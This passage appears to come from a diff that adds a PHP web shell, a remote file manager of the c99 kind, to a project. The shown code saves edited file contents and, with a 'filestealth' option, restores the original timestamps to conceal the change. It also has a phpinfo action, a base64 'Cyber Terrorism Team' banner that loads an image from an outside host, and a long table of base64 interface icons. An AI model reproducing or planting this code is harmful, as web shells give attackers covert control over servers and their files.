fwrite($fp,$nfcontent); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $nfcontent; + } +} +$rows = count(explode(" +",$r)); +if ($rows < 10) {$rows = 10;} +if ($rows > 30) {$rows = 30;} +echo "<form method=\"POST\"><input type=\"submit\" name=\"submit\" value=\"رîًُàيèٍü\">&nbsp;<input type=\"reset\" value=\"رلًîٌ\">&nbsp;<br><textarea name=\"nfcontent\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; + } + elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} + else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} + } +} +if ($act == "phpinfo") +{ + ob_end_clean(); + phpinfo(); + exit; +} +} +$data = base64_decode("PGNlbnRlcj48Zm9udCBzaXplPTIgY29sb3I9IzAwZmYwMD5DeWJlciBUZXJyb3Jpc20gVGVhbTwvZm9udD48YnI+PGZvbnQgc2l6ZT0yPg0KyOTl/ywg6Ofs5e3l7ej/IOTo5+Dp7eAg6CDx6vDo7/LgIOTu4eDi6Os6PC9mb250PjxpbWcgc3JjPWh0dHA6Ly9vbmxpbmUubWlyYWJpbGlzLmNvbS9zY3JpcHRzL29ubGluZS5kbGw/aWNxPTMzNTk3NjAyMSZpbWc9NSBoZWlnaHQ9MTggd2lkdGg9MTg+PGZvbnQgc2l6ZT0yIGNvbG9yPSNGRkRFMDA+IFJPRE5PQzwvZm9udD48L2NlbnRlcj4="); +if ($act == "img") +{ + @ob_clean(); + + $arrimg = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhEQAPAKIAAO/v8N3e387OzpSt72NzrVFZfCkxUv///yH5BAUUAAcALAAAAAARAA8AAANSe". +"Grc3uoYAEq4wWZqFtWXVnBehWUhKQ1V4b6uagwsZd/ATO84ru+0k/C3MxCOSIyDZhQ4nYRnZ2UQRJ9". +"W6aKaxV4F02r1CwWDF2bYyzyVPN6dBAA7", +"edit"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhDgAQALMPAKt5E8uYM7SBHLyJJMaTLsGOKaRyDJ5sBv/MZ//////ge//rhf/Ub//3kf//m". +"f///yH5BAEAAA8ALAAAAAAOABAAAARF8MlJq704axo6yUEiJsUVOqiTDIPgSkEjz6MIPMGi7/xyE4q". +"gcKj4MY7IJONWQDifUAQzSr0NqFErFnp7uASAsMFwKD8iADs=", +"small_unk"=> +"R0lGODlhEQAUANUhAOXl1c3MzJiYmCkufnoRE83MzTNOoszLzO4jI/HqQIeGh5iYlxZ7PRh8PXLM". +"2FRVVMvLyzRNofbHPnsRE+bm1QgJCebl1FRUVFVVVIaGh1VVVQcICCoufoaFhYWGhszMzP///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAACEALAAAAAARABQAAAaewJBw". +"SCwaj0hPZpnxOD2dhdFDsVgBV4tAU+yAvmCwAHQhesNhwQVTFnoVS2gn0/FsIJiht8ORcP4DfxVk". +"QxkgfIF/gBuEQh6HaF8WjHmOIIYJBF8GIBSUQ49eBAggBg4RniBclo8gE18MDQCDqyGhAFUUuLi0". +"oCAbFRvAwcCMtWeRYW0hGQcfAc/QBQEFzpUhbBoaGNsP2mtrSOLjSEEAOw==", +"sort_asc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", +"up"=> +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", +"write"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"ext_ani"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP/////MmczMmf/MzJmZZszMzP//zAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARbEMmJAKC4XhCKvRhABJZgACY4oSR3HmdFcQLndaVK7ziu". +"VQRBYBAI1IKWYrLIJBhwrBqzOHKCotMRcaCbBrRDz+pLHQ65IWOZKE4Lz+hM5SAcDNoZwOBAINxV". +"EQA7", +"ext_asp"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", +"ext_au"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_avi"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", +"ext_bat"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_bin"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ". +"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ". +"/aZBVOqkpUa/4KisRC6rEgA7", +"ext_bmp"=> +"R0lGODlhEAAQADMAACH5BAEAAAoALAAAAAAQABAAgwAAAMDAwP///4CAgIAAAICAAP//AP8AAAAA". +"gAAA/wAAAAAAAAAAAAAAAAAAAAAAAARgUKlBqx0yDyEACBxHZRMXDGC4YQOwCVQKdJ7bggcBtl8Q". +"AJNfIBcoGD4CH1CBSAByxp5pOUAgCFFf6HexIKeore+2BaJ8p1sqaU6NpdOgiQJny5On+u+e7qH3". +"EzWCgwARADs=", +"ext_cat"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg4CAgAAAAMDAwP///wAA/wAAgACAAAD/AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARdEMk5gQU0IyuOMUV1XYf3ESEgrCwQnGgQAENdjwCBFjO7". +"Xj9AaYbjFArBme1mKeiQLpWvqdMJosXB1akKbGxSzvXqVXEGNKDAuyGq0NqriyJTW2QaRP3Ozktk". +"fRQRADs=", +"ext_cgi"=> +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". +"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". +"RYtMAgEAOw==", +"ext_cmd"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_cnf"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgAAA/wD//wAAAANK". +"CLqs9weESSuAMZQSiPfBBUlVIJyo8EhbJ5TTRVJvM8gaR9TGRtyZSm1T+OFau87HGKQNnlBgA5Cq". +"Yh4vWOz6ikZFoynjSi6byQkAOw==", +"ext_com"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ". +"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ". +"/aZBVOqkpUa/4KisRC6rEgA7", +"ext_cov"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAEUxDJKY+9Fr3ND/JV9lASAHCV9mHPybXay7kb4LUmILWziOiPwaB1IH5i". +"uMVCaLGBRhOT0pQBri6mQEL3Q8py0ZwYTLE5b6Aw9lw+Y6glN2Ytt0QAADs=", +"ext_cpc"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd". +"GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7", +"ext_cpl"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAgv///wAAAICAgMDAwICAAP//AAAAAAAAAANJ". +"aLLc9lCASecQ8MlKB8ARRwVkEIqdqU0EEXCDqkxB4VZxSBTB8lqyTSD2+eVWE0lP8DrORgMiwLkZ". +"/aZBVOqkpUa/4KisRC6rEgA7", +"ext_cpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". +"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". +"Eq7YrLDE7a4SADs=", +"ext_crl"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd". +"GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7", +"ext_crt"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP///wCAAMDAwAAAgP//AICAgICAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARYEIlJK0VYmDE294YAZEMQFCZ6DiJpBsNRmuwoDephHGqd". +"GanYLBCyCYavYOsWIDQJUKePeXr1lprmM1ooklRJGrbkjEJhY7B6qvlwOh+sZb5EAO74PB4RAQA7", +"ext_css"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". +"SnEjgPVarHEHgrB43JvszsQEADs=", +"ext_diz"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". +"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". +"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 